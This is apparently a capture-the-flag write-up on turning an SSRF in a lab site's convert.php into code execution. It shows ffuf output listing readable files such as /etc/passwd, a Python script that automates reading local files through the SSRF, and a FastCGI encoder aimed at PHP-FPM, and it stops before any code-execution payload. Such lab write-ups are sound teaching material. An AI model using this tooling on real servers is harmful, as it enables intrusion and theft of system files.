Description
Obtain RCE on the host utils.edu.stf (10.124.1.237).
To get the flag, run the script /home/rceflag.
Continuing from the previous task, we already know that the site's convert.php page is vulnerable to SSRF. Now we want to leverage that to achieve remote code execution (RCE).
First, I scanned for local files that could be read through the file:// scheme, and discovered some interesting ones.
┌──(kali㉿kali)-[~/Desktop]
└─$ ffuf -u 'http://utils.edu.stf/convert.php?url=file://FUZZ' -w /usr/share/seclists/Fuzzing/LFI/LFI-linux-and-windows_by-1N3@CrowdShield.txt -fs 1018
        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://utils.edu.stf/convert.php?url=file://FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Fuzzing/LFI/LFI-linux-and-windows_by-1N3@CrowdShield.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 1018
________________________________________________
/etc/crontab [Status: 200, Size: 15268, Words: 397, Lines: 223, Duration: 236ms]
/etc/fstab [Status: 200, Size: 15056, Words: 391, Lines: 220, Duration: 239ms]
/etc/group [Status: 200, Size: 15274, Words: 393, Lines: 220, Duration: 365ms]
/etc/hosts [Status: 200, Size: 14734, Words: 388, Lines: 219, Duration: 245ms]
/etc/nginx/nginx.conf [Status: 200, Size: 15595, Words: 392, Lines: 222, Duration: 235ms]
/etc/issue [Status: 200, Size: 14608, Words: 388, Lines: 218, Duration: 230ms]
/etc/passwd [Status: 200, Size: 15514, Words: 392, Lines: 218, Duration: 272ms]
/etc/motd [Status: 200, Size: 14859, Words: 390, Lines: 220, Duration: 241ms]
/etc/nginx/sites-available/default [Status: 200, Size: 16184, Words: 393, Lines: 227, Duration: 259ms]
/etc/nginx/sites-enabled/default [Status: 200, Size: 16184, Words: 393, Lines: 227, Duration: 281ms]
/etc/ssh/sshd_config [Status: 200, Size: 16740, Words: 398, Lines: 227, Duration: 256ms]
/proc/cmdline [Status: 200, Size: 14700, Words: 388, Lines: 218, Duration: 218ms]
/proc/self/cmdline [Status: 200, Size: 14595, Words: 390, Lines: 217, Duration: 224ms]
/proc/self/stat [Status: 200, Size: 14799, Words: 389, Lines: 220, Duration: 227ms]
/proc/self/status [Status: 200, Size: 15284, Words: 392, Lines: 222, Duration: 234ms]
/proc/version [Status: 200, Size: 14716, Words: 391, Lines: 217, Duration: 243ms]
/var/log/lastlog [Status: 200, Size: 14653, Words: 388, Lines: 218, Duration: 246ms]
/var/run/utmp [Status: 200, Size: 14728, Words: 390, Lines: 218, Duration: 226ms]
/var/log/wtmp [Status: 200, Size: 21289, Words: 664, Lines: 321, Duration: 576ms]
:: Progress: [1155/1155] :: Job [1/1] :: 187 req/sec :: Duration: [0:00:07] :: Errors: 0 ::
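The baseline-size filtering that the ffuf run above relies on, written out in Python as an added example (this is not code from the original writeup). It requests a path that cannot exist to learn the size of the converter's error response (what -fs 1018 filtered out), keeps only paths whose response size differs, and then strips the page template by removing the prefix and suffix each hit shares with the baseline so the file body can be read directly. The converter's real wrapper HTML is unknown, so fake_fetch and _FAKE_FS are constructed stand-ins that let the script run offline; real_fetch is the drop-in for the live target.

```python
from __future__ import annotations

from typing import Callable, Iterable
from urllib.parse import quote, unquote
from urllib.request import urlopen

# Endpoint from the writeup; the SSRF parameter is "url".
TARGET = "http://utils.edu.stf/convert.php?url="

# Constructed sample filesystem for the offline stand-in below; not real host data.
_FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n",
    "/etc/hosts": "127.0.0.1 localhost\n10.124.1.237 utils.edu.stf\n",
}


def fake_fetch(url: str) -> bytes:
    """Stand-in for the converter (assumed behaviour): wrap the file body, or an
    error line when the file:// target does not exist, in a fixed HTML shell."""
    target = unquote(url[len(TARGET):])
    if not target.startswith("file://"):
        raise ValueError("stand-in only understands file:// targets")
    body = _FAKE_FS.get(target[len("file://"):], "Error: could not fetch URL")
    return f"<html><body><h1>Converted</h1><pre>{body}</pre></body></html>".encode()


def real_fetch(url: str) -> bytes:
    """Fetch from the live target (not used by the offline run)."""
    with urlopen(url, timeout=10) as resp:
        return resp.read()


def strip_template(baseline: bytes, resp: bytes) -> bytes:
    """Remove the longest prefix and suffix that resp shares with the baseline
    error page, leaving the embedded file content. Approximate: a file whose
    first or last bytes happen to match the error text loses those bytes."""
    limit = min(len(baseline), len(resp))
    pre = 0
    while pre < limit and baseline[pre] == resp[pre]:
        pre += 1
    suf = 0
    while suf < limit - pre and baseline[-1 - suf] == resp[-1 - suf]:
        suf += 1
    return resp[pre:len(resp) - suf]


def probe(paths: Iterable[str], fetch: Callable[[str], bytes] = fake_fetch) -> dict[str, bytes]:
    """Equivalent of the ffuf run: learn the error page size from a path that
    cannot exist, then keep every path whose response size differs from it.
    Wordlist duplicates (the repeated hits in the ffuf output) are collapsed first."""
    baseline = fetch(TARGET + quote("file:///nonexistent-" + "x" * 16, safe=":/"))
    hits: dict[str, bytes] = {}
    for path in dict.fromkeys(paths):
        resp = fetch(TARGET + quote("file://" + path, safe=":/"))
        if len(resp) != len(baseline):
            hits[path] = strip_template(baseline, resp)
    return hits


if __name__ == "__main__":
    # Offline run against the stand-in; swap in fetch=real_fetch for the target.
    for path, content in probe(["/etc/passwd", "/etc/passwd", "/etc/hosts", "/etc/shadow"]).items():
        print(f"== {path} ==")
        print(content.decode(errors="replace"))
```

Size-only filtering is what ffuf did, so a file whose wrapped page happens to be exactly 1018 bytes would be missed; comparing against the baseline body (as strip_template does) instead of the length alone avoids that.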
Then I searched for /etc/passwd and confirmed it was accessible.
Another interesting file that I found is /etc/nginx/sites-available/default, the default Nginx site config. It shows how requests for .php files are handed to PHP-FPM (via fastcgi_pass, either a TCP port such as 127.0.0.1:9000 or a Unix socket), which is key for FastCGI exploits: a TCP listener is a local service the SSRF may be able to reach, a Unix socket is not.
FastCGI is the protocol that lets Nginx forward PHP requests to PHP-FPM, which executes the script and returns the output to the web server.
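To make the Nginx to PHP-FPM hop concrete, here is a FastCGI record encoder and decoder, added as an example and not code from the original writeup. It builds the record sequence Nginx sends for one request to convert.php (BEGIN_REQUEST, PARAMS, an empty PARAMS terminator, STDIN, an empty STDIN terminator), parses a constructed PHP-FPM reply (STDOUT records followed by END_REQUEST), and round-trips the name/value encoding, including the 4-byte length form used for names or values of 128 bytes or more. The parameter values (the usual nginx fastcgi_params names and a guessed document root of /var/www/html) are assumptions, not taken from the host's configuration.

```python
from __future__ import annotations

import struct

# Record types and the responder role, from the FastCGI 1.0 specification.
FCGI_VERSION_1 = 1
FCGI_BEGIN_REQUEST, FCGI_END_REQUEST = 1, 3
FCGI_PARAMS, FCGI_STDIN, FCGI_STDOUT = 4, 5, 6
FCGI_RESPONDER = 1

# Assumed values for illustration: standard fastcgi_params names with a guessed
# document root. Not read from the target's nginx config.
EXAMPLE_PARAMS = {
    "GATEWAY_INTERFACE": "CGI/1.1",
    "REQUEST_METHOD": "GET",
    "SCRIPT_FILENAME": "/var/www/html/convert.php",
    "SCRIPT_NAME": "/convert.php",
    "QUERY_STRING": "url=file:///etc/passwd",
    "REQUEST_URI": "/convert.php?url=file:///etc/passwd",
    "SERVER_PROTOCOL": "HTTP/1.1",
    "SERVER_SOFTWARE": "nginx",
    "REMOTE_ADDR": "127.0.0.1",
}


def _encode_length(n: int) -> bytes:
    # Name/value lengths: one byte if < 128, else four bytes with the high bit set.
    return bytes([n]) if n < 0x80 else struct.pack(">I", n | 0x80000000)


def _decode_length(buf: bytes, pos: int) -> tuple[int, int]:
    if buf[pos] & 0x80:
        return struct.unpack(">I", buf[pos:pos + 4])[0] & 0x7FFFFFFF, pos + 4
    return buf[pos], pos + 1


def encode_record(rtype: int, content: bytes, request_id: int = 1) -> bytes:
    # 8-byte header: version, type, requestId, contentLength, paddingLength, reserved.
    # Content is padded to a multiple of 8 bytes, as the spec recommends.
    padding = (8 - len(content) % 8) % 8
    header = struct.pack(">BBHHBx", FCGI_VERSION_1, rtype, request_id, len(content), padding)
    return header + content + b"\x00" * padding


def encode_params(params: dict[str, str]) -> bytes:
    out = b""
    for name, value in params.items():
        n, v = name.encode(), value.encode()
        out += _encode_length(len(n)) + _encode_length(len(v)) + n + v
    return out


def build_request(params: dict[str, str], body: bytes = b"", request_id: int = 1) -> bytes:
    # The record sequence nginx sends for one PHP request.
    begin = struct.pack(">HB5x", FCGI_RESPONDER, 0)  # role, flags, reserved
    return b"".join([
        encode_record(FCGI_BEGIN_REQUEST, begin, request_id),
        encode_record(FCGI_PARAMS, encode_params(params), request_id),
        encode_record(FCGI_PARAMS, b"", request_id),   # end of params
        encode_record(FCGI_STDIN, body, request_id),
        encode_record(FCGI_STDIN, b"", request_id),    # end of stdin
    ])


def parse_records(data: bytes) -> list[tuple[int, int, bytes]]:
    # Split a byte stream into (type, requestId, content) tuples, dropping padding.
    records, pos = [], 0
    while pos + 8 <= len(data):
        version, rtype, rid, clen, plen = struct.unpack(">BBHHBx", data[pos:pos + 8])
        if version != FCGI_VERSION_1:
            raise ValueError("bad FastCGI version")
        pos += 8
        records.append((rtype, rid, data[pos:pos + clen]))
        pos += clen + plen
    return records


def parse_params(content: bytes) -> dict[str, str]:
    params, pos = {}, 0
    while pos < len(content):
        nlen, pos = _decode_length(content, pos)
        vlen, pos = _decode_length(content, pos)
        name, pos = content[pos:pos + nlen].decode(), pos + nlen
        value, pos = content[pos:pos + vlen].decode(), pos + vlen
        params[name] = value
    return params


def parse_response(data: bytes) -> tuple[bytes, int | None]:
    # What PHP-FPM sends back: STDOUT records (CGI headers plus body), then
    # END_REQUEST carrying the application status.
    stdout, app_status = b"", None
    for rtype, _rid, content in parse_records(data):
        if rtype == FCGI_STDOUT:
            stdout += content
        elif rtype == FCGI_END_REQUEST:
            app_status = struct.unpack(">IB3x", content)[0]
    return stdout, app_status


# Constructed stand-in for a PHP-FPM reply; not captured from the target.
FAKE_FPM_REPLY = (
    encode_record(FCGI_STDOUT, b"Content-type: text/html\r\n\r\nhello from php")
    + encode_record(FCGI_STDOUT, b"")
    + encode_record(FCGI_END_REQUEST, struct.pack(">IB3x", 0, 0))
)

if __name__ == "__main__":
    print(build_request(EXAMPLE_PARAMS).hex())
    print(parse_response(FAKE_FPM_REPLY))
```

The bytes from build_request are exactly what travels over the fastcgi_pass link. On a TCP listener, anything that can open that socket and write raw bytes can speak to PHP-FPM directly; on a Unix socket, only a local process with filesystem access to it can, which is why the fastcgi_pass line in the Nginx config is the first thing to read.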